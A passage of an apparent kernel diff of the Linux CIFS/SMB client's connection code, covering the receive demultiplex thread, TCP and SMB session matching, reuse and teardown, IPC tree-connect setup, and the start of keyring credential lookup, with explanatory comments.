++		return length;
++	server->total_read += length;
++
++	dump_smb(buf, server->total_read);
++
++	return cifs_handle_standard(server, mid);
++}
++
++int
++cifs_handle_standard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
++	int rc;
++
++	/*
++	 * We know that we received enough to get to the MID as we
++	 * checked the pdu_length earlier. Now check to see
++	 * if the rest of the header is OK.
++	 *
++	 * 48 bytes is enough to display the header and a little bit
++	 * into the payload for debugging purposes.
++	 */
++	rc = server->ops->check_message(buf, server->total_read, server);
++	if (rc)
++		cifs_dump_mem("Bad SMB: ", buf,
++			min_t(unsigned int, server->total_read, 48));
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++	    server->ops->is_status_pending(buf, server))
++		return -1;
++
++	if (!mid)
++		return rc;
++
++	handle_mid(mid, server, buf, rc);
++	return 0;
++}
++
++static void
++smb2_add_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
++	int scredits, in_flight;
++
++	/*
++	 * SMB1 does not use credits.
++	 */
++	if (is_smb1(server))
++		return;
++
++	if (shdr->CreditRequest) {
++		spin_lock(&server->req_lock);
++		server->credits += le16_to_cpu(shdr->CreditRequest);
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++		wake_up(&server->request_q);
++
++		trace_smb3_hdr_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits,
++				le16_to_cpu(shdr->CreditRequest), in_flight);
++		cifs_server_dbg(FYI, "%s: added %u credits total=%d\n",
++				__func__, le16_to_cpu(shdr->CreditRequest),
++				scredits);
++	}
++}
++
++static int
++cifs_demultiplex_thread(void *p)
++{
++	int i, num_mids, length;
++	struct TCP_Server_Info *server = p;
++	unsigned int pdu_length;
++	unsigned int next_offset;
++	char *buf = NULL;
++	struct task_struct *task_to_wake = NULL;
++	struct mid_q_entry *mids[MAX_COMPOUND];
++	char *bufs[MAX_COMPOUND];
++	unsigned int noreclaim_flag, num_io_timeout = 0;
++
++	noreclaim_flag = memalloc_noreclaim_save();
++	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
++
++	length = atomic_inc_return(&tcpSesAllocCount);
++	if (length > 1)
++		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
++
++	set_freezable();
++	allow_kernel_signal(SIGKILL);
++	while (server->tcpStatus != CifsExiting) {
++		if (try_to_freeze())
++			continue;
++
++		if (!allocate_buffers(server))
++			continue;
++
++		server->large_buf = false;
++		buf = server->smallbuf;
++		pdu_length = 4; /* enough to get RFC1001 header */
++
++		length = cifs_read_from_socket(server, buf, pdu_length);
++		if (length < 0)
++			continue;
++
++		if (is_smb1(server))
++			server->total_read = length;
++		else
++			server->total_read = 0;
++
++		/*
++		 * The right amount was read from socket - 4 bytes,
++		 * so we can now interpret the length field.
++		 */
++		pdu_length = get_rfc1002_length(buf);
++
++		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
++		if (!is_smb_response(server, buf[0]))
++			continue;
++next_pdu:
++		server->pdu_size = pdu_length;
++
++		/* make sure we have enough to get to the MID */
++		if (server->pdu_size < MID_HEADER_SIZE(server)) {
++			cifs_server_dbg(VFS, "SMB response too short (%u bytes)\n",
++				 server->pdu_size);
++			cifs_reconnect(server, true);
++			continue;
++		}
++
++		/* read down to the MID */
++		length = cifs_read_from_socket(server,
++			     buf + HEADER_PREAMBLE_SIZE(server),
++			     MID_HEADER_SIZE(server));
++		if (length < 0)
++			continue;
++		server->total_read += length;
++
++		if (server->ops->next_header) {
++			next_offset = server->ops->next_header(buf);
++			if (next_offset)
++				server->pdu_size = next_offset;
++		}
++
++		memset(mids, 0, sizeof(mids));
++		memset(bufs, 0, sizeof(bufs));
++		num_mids = 0;
++
++		if (server->ops->is_transform_hdr &&
++		    server->ops->receive_transform &&
++		    server->ops->is_transform_hdr(buf)) {
++			length = server->ops->receive_transform(server,
++								mids,
++								bufs,
++								&num_mids);
++		} else {
++			mids[0] = server->ops->find_mid(server, buf);
++			bufs[0] = buf;
++			num_mids = 1;
++
++			if (!mids[0] || !mids[0]->receive)
++				length = standard_receive3(server, mids[0]);
++			else
++				length = mids[0]->receive(server, mids[0]);
++		}
++
++		if (length < 0) {
++			for (i = 0; i < num_mids; i++)
++				if (mids[i])
++					release_mid(mids[i]);
++			continue;
++		}
++
++		if (server->ops->is_status_io_timeout &&
++		    server->ops->is_status_io_timeout(buf)) {
++			num_io_timeout++;
++			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
++				cifs_reconnect(server, false);
++				num_io_timeout = 0;
++				continue;
++			}
++		}
++
++		server->lstrp = jiffies;
++
++		for (i = 0; i < num_mids; i++) {
++			if (mids[i] != NULL) {
++				mids[i]->resp_buf_size = server->pdu_size;
++
++				if (bufs[i] && server->ops->is_network_name_deleted)
++					server->ops->is_network_name_deleted(bufs[i],
++									server);
++
++				if (!mids[i]->multiRsp || mids[i]->multiEnd)
++					mids[i]->callback(mids[i]);
++
++				release_mid(mids[i]);
++			} else if (server->ops->is_oplock_break &&
++				   server->ops->is_oplock_break(bufs[i],
++								server)) {
++				smb2_add_credits_from_hdr(bufs[i], server);
++				cifs_dbg(FYI, "Received oplock break\n");
++			} else {
++				cifs_server_dbg(VFS, "No task to wake, unknown frame received! NumMids %d\n",
++						atomic_read(&mid_count));
++				cifs_dump_mem("Received Data is: ", bufs[i],
++					      HEADER_SIZE(server));
++				smb2_add_credits_from_hdr(bufs[i], server);
++#ifdef CONFIG_CIFS_DEBUG2
++				if (server->ops->dump_detail)
++					server->ops->dump_detail(bufs[i],
++								 server);
++				cifs_dump_mids(server);
++#endif /* CIFS_DEBUG2 */
++			}
++		}
++
++		if (pdu_length > server->pdu_size) {
++			if (!allocate_buffers(server))
++				continue;
++			pdu_length -= server->pdu_size;
++			server->total_read = 0;
++			server->large_buf = false;
++			buf = server->smallbuf;
++			goto next_pdu;
++		}
++	} /* end while !EXITING */
++
++	/* buffer usually freed in free_mid - need to free it here on exit */
++	cifs_buf_release(server->bigbuf);
++	if (server->smallbuf) /* no sense logging a debug message if NULL */
++		cifs_small_buf_release(server->smallbuf);
++
++	task_to_wake = xchg(&server->tsk, NULL);
++	clean_demultiplex_info(server);
++
++	/* if server->tsk was NULL then wait for a signal before exiting */
++	if (!task_to_wake) {
++		set_current_state(TASK_INTERRUPTIBLE);
++		while (!signal_pending(current)) {
++			schedule();
++			set_current_state(TASK_INTERRUPTIBLE);
++		}
++		set_current_state(TASK_RUNNING);
++	}
++
++	memalloc_noreclaim_restore(noreclaim_flag);
++	module_put_and_kthread_exit(0);
++}
++
++/*
++ * Returns true if srcaddr isn't specified and rhs isn't specified, or
++ * if srcaddr is specified and matches the IP address of the rhs argument
++ */
++bool
++cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs)
++{
++	switch (srcaddr->sa_family) {
++	case AF_UNSPEC:
++		return (rhs->sa_family == AF_UNSPEC);
++	case AF_INET: {
++		struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
++		struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
++		return (saddr4->sin_addr.s_addr == vaddr4->sin_addr.s_addr);
++	}
++	case AF_INET6: {
++		struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
++		struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
++		return ipv6_addr_equal(&saddr6->sin6_addr, &vaddr6->sin6_addr);
++	}
++	default:
++		WARN_ON(1);
++		return false; /* don't expect to be here */
++	}
++}
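++
++/*
++ * For instance, a mount that never specified a source address leaves
++ * srcaddr as AF_UNSPEC, which matches only another AF_UNSPEC source;
++ * such mounts can share a server entry with each other, but never
++ * with one bound to a specific local address.
++ */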
++
++/*
++ * If no port is specified in the addr structure, we try to match with
++ * port 445, and if that fails, with port 139. This should be called only
++ * if the address families of server and addr are equal.
++ */
++static bool
++match_port(struct TCP_Server_Info *server, struct sockaddr *addr)
++{
++	__be16 port, *sport;
++
++	/* SMBDirect manages its own ports, don't match it here */
++	if (server->rdma)
++		return true;
++
++	switch (addr->sa_family) {
++	case AF_INET:
++		sport = &((struct sockaddr_in *) &server->dstaddr)->sin_port;
++		port = ((struct sockaddr_in *) addr)->sin_port;
++		break;
++	case AF_INET6:
++		sport = &((struct sockaddr_in6 *) &server->dstaddr)->sin6_port;
++		port = ((struct sockaddr_in6 *) addr)->sin6_port;
++		break;
++	default:
++		WARN_ON(1);
++		return false;
++	}
++
++	if (!port) {
++		port = htons(CIFS_PORT);
++		if (port == *sport)
++			return true;
++
++		port = htons(RFC1001_PORT);
++	}
++
++	return port == *sport;
++}
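++
++/*
++ * Example: a ctx that left the port at 0 matches a server connected
++ * to either 445 (CIFS_PORT) or 139 (RFC1001_PORT); an explicit port
++ * must match exactly, and SMBDirect (rdma) servers match regardless
++ * of port.
++ */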
++
++static bool
++match_address(struct TCP_Server_Info *server, struct sockaddr *addr,
++	      struct sockaddr *srcaddr)
++{
++	switch (addr->sa_family) {
++	case AF_INET: {
++		struct sockaddr_in *addr4 = (struct sockaddr_in *)addr;
++		struct sockaddr_in *srv_addr4 =
++					(struct sockaddr_in *)&server->dstaddr;
++
++		if (addr4->sin_addr.s_addr != srv_addr4->sin_addr.s_addr)
++			return false;
++		break;
++	}
++	case AF_INET6: {
++		struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)addr;
++		struct sockaddr_in6 *srv_addr6 =
++					(struct sockaddr_in6 *)&server->dstaddr;
++
++		if (!ipv6_addr_equal(&addr6->sin6_addr,
++				     &srv_addr6->sin6_addr))
++			return false;
++		if (addr6->sin6_scope_id != srv_addr6->sin6_scope_id)
++			return false;
++		break;
++	}
++	default:
++		WARN_ON(1);
++		return false; /* don't expect to be here */
++	}
++
++	if (!cifs_match_ipaddr(srcaddr, (struct sockaddr *)&server->srcaddr))
++		return false;
++
++	return true;
++}
++
++static bool
++match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	/*
++	 * The select_sectype function should either return the ctx->sectype
++	 * that was specified, or "Unspecified" if that sectype was not
++	 * compatible with the given NEGOTIATE request.
++	 */
++	if (server->ops->select_sectype(server, ctx->sectype)
++	     == Unspecified)
++		return false;
++
++	/*
++	 * Now check if the signing mode is acceptable. No need to check
++	 * global_secflags at this point since if MUST_SIGN is set then
++	 * server->sign had better be set too.
++	 */
++	if (ctx->sign && !server->sign)
++		return false;
++
++	return true;
++}
++
++/* this function must be called with srv_lock held */
++static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
++
++	lockdep_assert_held(&server->srv_lock);
++
++	if (ctx->nosharesock)
++		return 0;
++
++	/* this server does not share socket */
++	if (server->nosharesock)
++		return 0;
++
++	/* If multidialect negotiation see if existing sessions match one */
++	if (strcmp(ctx->vals->version_string, SMB3ANY_VERSION_STRING) == 0) {
++		if (server->vals->protocol_id < SMB30_PROT_ID)
++			return 0;
++	} else if (strcmp(ctx->vals->version_string,
++		   SMBDEFAULT_VERSION_STRING) == 0) {
++		if (server->vals->protocol_id < SMB21_PROT_ID)
++			return 0;
++	} else if ((server->vals != ctx->vals) || (server->ops != ctx->ops))
++		return 0;
++
++	if (!net_eq(cifs_net_ns(server), current->nsproxy->net_ns))
++		return 0;
++
++	if (strcasecmp(server->hostname, ctx->server_hostname))
++		return 0;
++
++	if (!match_address(server, addr,
++			   (struct sockaddr *)&ctx->srcaddr))
++		return 0;
++
++	if (!match_port(server, addr))
++		return 0;
++
++	if (!match_security(server, ctx))
++		return 0;
++
++	if (server->echo_interval != ctx->echo_interval * HZ)
++		return 0;
++
++	if (server->rdma != ctx->rdma)
++		return 0;
++
++	if (server->ignore_signature != ctx->ignore_signature)
++		return 0;
++
++	if (server->min_offload != ctx->min_offload)
++		return 0;
++
++	return 1;
++}
++
++struct TCP_Server_Info *
++cifs_find_tcp_session(struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		spin_lock(&server->srv_lock);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++		/*
++		 * DFS failover implementation in cifs_reconnect() requires unique tcp sessions for
++		 * DFS connections to do failover properly, so avoid sharing them with regular
++		 * shares or even links that may connect to the same server but have completely
++		 * different failover targets.
++		 */
++		if (server->is_dfs_conn) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++#endif
++		/*
++		 * Skip ses channels since they're only handled in lower layers
++		 * (e.g. cifs_send_recv).
++		 */
++		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++		spin_unlock(&server->srv_lock);
++
++		++server->srv_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		cifs_dbg(FYI, "Existing tcp session with server found\n");
++		return server;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void
++cifs_put_tcp_session(struct TCP_Server_Info *server, int from_reconnect)
++{
++	struct task_struct *task;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (--server->srv_count > 0) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++
++	/* srv_count can never go negative */
++	WARN_ON(server->srv_count < 0);
++
++	put_net(cifs_net_ns(server));
++
++	list_del_init(&server->tcp_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* For secondary channels, we pick up ref-count on the primary server */
++	if (CIFS_SERVER_IS_CHAN(server))
++		cifs_put_tcp_session(server->primary_server, from_reconnect);
++
++	cancel_delayed_work_sync(&server->echo);
++	cancel_delayed_work_sync(&server->resolve);
++
++	if (from_reconnect)
++		/*
++		 * Avoid deadlock here: reconnect work calls
++		 * cifs_put_tcp_session() at its end. Need to be sure
++		 * that reconnect work does nothing with server pointer after
++		 * that step.
++		 */
++		cancel_delayed_work(&server->reconnect);
++	else
++		cancel_delayed_work_sync(&server->reconnect);
++
++	spin_lock(&server->srv_lock);
++	server->tcpStatus = CifsExiting;
++	spin_unlock(&server->srv_lock);
++
++	cifs_crypto_secmech_release(server);
++
++	kfree_sensitive(server->session_key.response);
++	server->session_key.response = NULL;
++	server->session_key.len = 0;
++	kfree(server->hostname);
++	server->hostname = NULL;
++
++	task = xchg(&server->tsk, NULL);
++	if (task)
++		send_sig(SIGKILL, task, 1);
++}
++
++struct TCP_Server_Info *
++cifs_get_tcp_session(struct smb3_fs_context *ctx,
++		     struct TCP_Server_Info *primary_server)
++{
++	struct TCP_Server_Info *tcp_ses = NULL;
++	int rc;
++
++	cifs_dbg(FYI, "UNC: %s\n", ctx->UNC);
++
++	/* see if we already have a matching tcp_ses */
++	tcp_ses = cifs_find_tcp_session(ctx);
++	if (tcp_ses)
++		return tcp_ses;
++
++	tcp_ses = kzalloc(sizeof(struct TCP_Server_Info), GFP_KERNEL);
++	if (!tcp_ses) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++
++	tcp_ses->hostname = kstrdup(ctx->server_hostname, GFP_KERNEL);
++	if (!tcp_ses->hostname) {
++		rc = -ENOMEM;
++		goto out_err;
++	}
++
++	if (ctx->nosharesock)
++		tcp_ses->nosharesock = true;
++
++	tcp_ses->ops = ctx->ops;
++	tcp_ses->vals = ctx->vals;
++	cifs_set_net_ns(tcp_ses, get_net(current->nsproxy->net_ns));
++
++	tcp_ses->conn_id = atomic_inc_return(&tcpSesNextId);
++	tcp_ses->noblockcnt = ctx->rootfs;
++	tcp_ses->noblocksnd = ctx->noblocksnd || ctx->rootfs;
++	tcp_ses->noautotune = ctx->noautotune;
++	tcp_ses->tcp_nodelay = ctx->sockopt_tcp_nodelay;
++	tcp_ses->rdma = ctx->rdma;
++	tcp_ses->in_flight = 0;
++	tcp_ses->max_in_flight = 0;
++	tcp_ses->credits = 1;
++	if (primary_server) {
++		spin_lock(&cifs_tcp_ses_lock);
++		++primary_server->srv_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		tcp_ses->primary_server = primary_server;
++	}
++	init_waitqueue_head(&tcp_ses->response_q);
++	init_waitqueue_head(&tcp_ses->request_q);
++	INIT_LIST_HEAD(&tcp_ses->pending_mid_q);
++	mutex_init(&tcp_ses->_srv_mutex);
++	memcpy(tcp_ses->workstation_RFC1001_name,
++		ctx->source_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
++	memcpy(tcp_ses->server_RFC1001_name,
++		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
++	tcp_ses->session_estab = false;
++	tcp_ses->sequence_number = 0;
++	tcp_ses->reconnect_instance = 1;
++	tcp_ses->lstrp = jiffies;
++	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
++	spin_lock_init(&tcp_ses->req_lock);
++	spin_lock_init(&tcp_ses->srv_lock);
++	spin_lock_init(&tcp_ses->mid_lock);
++	INIT_LIST_HEAD(&tcp_ses->tcp_ses_list);
++	INIT_LIST_HEAD(&tcp_ses->smb_ses_list);
++	INIT_DELAYED_WORK(&tcp_ses->echo, cifs_echo_request);
++	INIT_DELAYED_WORK(&tcp_ses->resolve, cifs_resolve_server);
++	INIT_DELAYED_WORK(&tcp_ses->reconnect, smb2_reconnect_server);
++	mutex_init(&tcp_ses->reconnect_mutex);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	mutex_init(&tcp_ses->refpath_lock);
++#endif
++	memcpy(&tcp_ses->srcaddr, &ctx->srcaddr,
++	       sizeof(tcp_ses->srcaddr));
++	memcpy(&tcp_ses->dstaddr, &ctx->dstaddr,
++		sizeof(tcp_ses->dstaddr));
++	if (ctx->use_client_guid)
++		memcpy(tcp_ses->client_guid, ctx->client_guid,
++		       SMB2_CLIENT_GUID_SIZE);
++	else
++		generate_random_uuid(tcp_ses->client_guid);
++	/*
++	 * At this point we are the only ones with a pointer to the
++	 * struct, since the kernel thread has not been created yet;
++	 * no need to spinlock this init of tcpStatus or srv_count.
++	 */
++	tcp_ses->tcpStatus = CifsNew;
++	++tcp_ses->srv_count;
++
++	if (ctx->echo_interval >= SMB_ECHO_INTERVAL_MIN &&
++		ctx->echo_interval <= SMB_ECHO_INTERVAL_MAX)
++		tcp_ses->echo_interval = ctx->echo_interval * HZ;
++	else
++		tcp_ses->echo_interval = SMB_ECHO_INTERVAL_DEFAULT * HZ;
++	if (tcp_ses->rdma) {
++#ifndef CONFIG_CIFS_SMB_DIRECT
++		cifs_dbg(VFS, "CONFIG_CIFS_SMB_DIRECT is not enabled\n");
++		rc = -ENOENT;
++		goto out_err_crypto_release;
++#endif
++		tcp_ses->smbd_conn = smbd_get_connection(
++			tcp_ses, (struct sockaddr *)&ctx->dstaddr);
++		if (tcp_ses->smbd_conn) {
++			cifs_dbg(VFS, "RDMA transport established\n");
++			rc = 0;
++			goto smbd_connected;
++		} else {
++			rc = -ENOENT;
++			goto out_err_crypto_release;
++		}
++	}
++	rc = ip_connect(tcp_ses);
++	if (rc < 0) {
++		cifs_dbg(VFS, "Error connecting to socket. Aborting operation.\n");
++		goto out_err_crypto_release;
++	}
++smbd_connected:
++	/*
++	 * since we're in a cifs function already, we know that
++	 * this will succeed. No need for try_module_get().
++	 */
++	__module_get(THIS_MODULE);
++	tcp_ses->tsk = kthread_run(cifs_demultiplex_thread,
++				  tcp_ses, "cifsd");
++	if (IS_ERR(tcp_ses->tsk)) {
++		rc = PTR_ERR(tcp_ses->tsk);
++		cifs_dbg(VFS, "error %d create cifsd thread\n", rc);
++		module_put(THIS_MODULE);
++		goto out_err_crypto_release;
++	}
++	tcp_ses->min_offload = ctx->min_offload;
++	/*
++	 * The demultiplex thread has been spawned above, so other
++	 * threads can now see this struct; take srv_lock before
++	 * updating tcpStatus.
++	 */
++	spin_lock(&tcp_ses->srv_lock);
++	tcp_ses->tcpStatus = CifsNeedNegotiate;
++	spin_unlock(&tcp_ses->srv_lock);
++
++	if ((ctx->max_credits < 20) || (ctx->max_credits > 60000))
++		tcp_ses->max_credits = SMB2_MAX_CREDITS_AVAILABLE;
++	else
++		tcp_ses->max_credits = ctx->max_credits;
++
++	tcp_ses->nr_targets = 1;
++	tcp_ses->ignore_signature = ctx->ignore_signature;
++	/* thread spawned, put it on the list */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&tcp_ses->tcp_ses_list, &cifs_tcp_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* queue echo request delayed work */
++	queue_delayed_work(cifsiod_wq, &tcp_ses->echo, tcp_ses->echo_interval);
++
++	/* queue dns resolution delayed work */
++	cifs_dbg(FYI, "%s: next dns resolution scheduled for %d seconds in the future\n",
++		 __func__, SMB_DNS_RESOLVE_INTERVAL_DEFAULT);
++
++	queue_delayed_work(cifsiod_wq, &tcp_ses->resolve, (SMB_DNS_RESOLVE_INTERVAL_DEFAULT * HZ));
++
++	return tcp_ses;
++
++out_err_crypto_release:
++	cifs_crypto_secmech_release(tcp_ses);
++
++	put_net(cifs_net_ns(tcp_ses));
++
++out_err:
++	if (tcp_ses) {
++		if (CIFS_SERVER_IS_CHAN(tcp_ses))
++			cifs_put_tcp_session(tcp_ses->primary_server, false);
++		kfree(tcp_ses->hostname);
++		if (tcp_ses->ssocket)
++			sock_release(tcp_ses->ssocket);
++		kfree(tcp_ses);
++	}
++	return ERR_PTR(rc);
++}
++
++/* this function must be called with ses_lock and chan_lock held */
++static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	if (ctx->sectype != Unspecified &&
++	    ctx->sectype != ses->sectype)
++		return 0;
++
++	/*
++	 * If an existing session is limited to fewer channels than
++	 * requested, it should not be reused
++	 */
++	if (ses->chan_max < ctx->max_channels)
++		return 0;
++
++	switch (ses->sectype) {
++	case Kerberos:
++		if (!uid_eq(ctx->cred_uid, ses->cred_uid))
++			return 0;
++		break;
++	default:
++		/* NULL username means anonymous session */
++		if (ses->user_name == NULL) {
++			if (!ctx->nullauth)
++				return 0;
++			break;
++		}
++
++		/* anything else takes username/password */
++		if (strncmp(ses->user_name,
++			    ctx->username ? ctx->username : "",
++			    CIFS_MAX_USERNAME_LEN))
++			return 0;
++		if ((ctx->username && strlen(ctx->username) != 0) &&
++		    ses->password != NULL &&
++		    strncmp(ses->password,
++			    ctx->password ? ctx->password : "",
++			    CIFS_MAX_PASSWORD_LEN))
++			return 0;
++	}
++	return 1;
++}
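++
++/*
++ * In short: Kerberos sessions are matched on cred_uid, a NULL
++ * user_name is reused only by another nullauth mount, and everything
++ * else must agree on the username and, when one was supplied, the
++ * password (on top of the sectype and chan_max checks above).
++ */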
++
++/**
++ * cifs_setup_ipc - helper to setup the IPC tcon for the session
++ * @ses: smb session to issue the request on
++ * @ctx: the superblock configuration context to use for building the
++ *       new tree connection for the IPC (interprocess communication RPC)
++ *
++ * A new IPC connection is made and stored in the session
++ * tcon_ipc. The IPC tcon has the same lifetime as the session.
++ */
++static int
++cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	int rc = 0, xid;
++	struct cifs_tcon *tcon;
++	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
++	bool seal = false;
++	struct TCP_Server_Info *server = ses->server;
++
++	/*
++	 * If the mount request that resulted in the creation of the
++	 * session requires encryption, force IPC to be encrypted too.
++	 */
++	if (ctx->seal) {
++		if (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION)
++			seal = true;
++		else {
++			cifs_server_dbg(VFS,
++				 "IPC: server doesn't support encryption\n");
++			return -EOPNOTSUPP;
++		}
++	}
++
++	tcon = tconInfoAlloc();
++	if (tcon == NULL)
++		return -ENOMEM;
++
++	spin_lock(&server->srv_lock);
++	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
++
++	xid = get_xid();
++	tcon->ses = ses;
++	tcon->ipc = true;
++	tcon->seal = seal;
++	rc = server->ops->tree_connect(xid, ses, unc, tcon, ctx->local_nls);
++	free_xid(xid);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "failed to connect to IPC (rc=%d)\n", rc);
++		tconInfoFree(tcon);
++		goto out;
++	}
++
++	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
++
++	spin_lock(&tcon->tc_lock);
++	tcon->status = TID_GOOD;
++	spin_unlock(&tcon->tc_lock);
++	ses->tcon_ipc = tcon;
++out:
++	return rc;
++}
++
++/**
++ * cifs_free_ipc - helper to release the session IPC tcon
++ * @ses: smb session to unmount the IPC from
++ *
++ * Needs to be called every time a session is destroyed.
++ *
++ * On session close, the IPC is closed and the server must release all tcons of the session.
++ * No need to send a tree disconnect here.
++ *
++ * Besides, skipping the tree disconnect makes the server not close durable and resilient
++ * files on session close, as specified in MS-SMB2 3.3.5.6 Receiving an SMB2 LOGOFF Request.
++ */
++static int
++cifs_free_ipc(struct cifs_ses *ses)
++{
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++
++	if (tcon == NULL)
++		return 0;
++
++	tconInfoFree(tcon);
++	ses->tcon_ipc = NULL;
++	return 0;
++}
++
++static struct cifs_ses *
++cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	struct cifs_ses *ses;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_lock(&ses->chan_lock);
++		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++
++		++ses->ses_count;
++		spin_unlock(&cifs_tcp_ses_lock);
++		return ses;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void cifs_put_smb_ses(struct cifs_ses *ses)
++{
++	unsigned int rc, xid;
++	unsigned int chan_count;
++	struct TCP_Server_Info *server = ses->server;
++
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return;
++	}
++	spin_unlock(&ses->ses_lock);
++
++	cifs_dbg(FYI, "%s: ses_count=%d\n", __func__, ses->ses_count);
++	cifs_dbg(FYI,
++		 "%s: ses ipc: %s\n", __func__, ses->tcon_ipc ? ses->tcon_ipc->tree_name : "NONE");
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (--ses->ses_count > 0) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* ses_count can never go negative */
++	WARN_ON(ses->ses_count < 0);
++
++	if (ses->ses_status == SES_GOOD)
++		ses->ses_status = SES_EXITING;
++
++	cifs_free_ipc(ses);
++
++	if (ses->ses_status == SES_EXITING && server->ops->logoff) {
++		xid = get_xid();
++		rc = server->ops->logoff(xid, ses);
++		if (rc)
++			cifs_server_dbg(VFS, "%s: Session Logoff failure rc=%d\n",
++				__func__, rc);
++		_free_xid(xid);
++	}
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_del_init(&ses->smb_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	chan_count = ses->chan_count;
++
++	/* close any extra channels */
++	if (chan_count > 1) {
++		int i;
++
++		for (i = 1; i < chan_count; i++) {
++			if (ses->chans[i].iface) {
++				kref_put(&ses->chans[i].iface->refcount, release_iface);
++				ses->chans[i].iface = NULL;
++			}
++			cifs_put_tcp_session(ses->chans[i].server, 0);
++			ses->chans[i].server = NULL;
++		}
++	}
++
++	sesInfoFree(ses);
++	cifs_put_tcp_session(server, 0);
++}
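++
++/*
++ * Dropping the last session reference above cascades: the IPC tcon is
++ * freed, a logoff is sent while the transport is still usable, any
++ * extra channels give back their tcp session references, and finally
++ * the primary tcp session reference is released.
++ */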
++
++#ifdef CONFIG_KEYS
++
++/* strlen("cifs:a:") + CIFS_MAX_DOMAINNAME_LEN + 1 */
++#define CIFSCREDS_DESC_SIZE (7 + CIFS_MAX_DOMAINNAME_LEN + 1)
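++
++/*
++ * The keys looked up below are "logon" keys whose description is
++ * "cifs:a:<address>" or "cifs:d:<domain>" and whose payload is
++ * "username:password". A user would typically add one with something
++ * like (illustrative):
++ *
++ *	keyctl add logon cifs:a:192.168.0.2 'alice:secret' @s
++ */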
++
++/* Populate username and pw fields from keyring if possible */
++static int
++cifs_set_cifscreds(struct smb3_fs_context *ctx, struct cifs_ses *ses)
++{
++	int rc = 0;
++	int is_domain = 0;
++	const char *delim, *payload;
++	char *desc;
++	ssize_t len;
++	struct key *key;
++	struct TCP_Server_Info *server = ses->server;
++	struct sockaddr_in *sa;
++	struct sockaddr_in6 *sa6;
++	const struct user_key_payload *upayload;
++
++	desc = kmalloc(CIFSCREDS_DESC_SIZE, GFP_KERNEL);
++	if (!desc)
++		return -ENOMEM;
++
++	/* try to find an address key first */
++	switch (server->dstaddr.ss_family) {
++	case AF_INET:
++		sa = (struct sockaddr_in *)&server->dstaddr;
++		sprintf(desc, "cifs:a:%pI4", &sa->sin_addr.s_addr);
++		break;
++	case AF_INET6:
++		sa6 = (struct sockaddr_in6 *)&server->dstaddr;
++		sprintf(desc, "cifs:a:%pI6c", &sa6->sin6_addr.s6_addr);
++		break;
++	default:
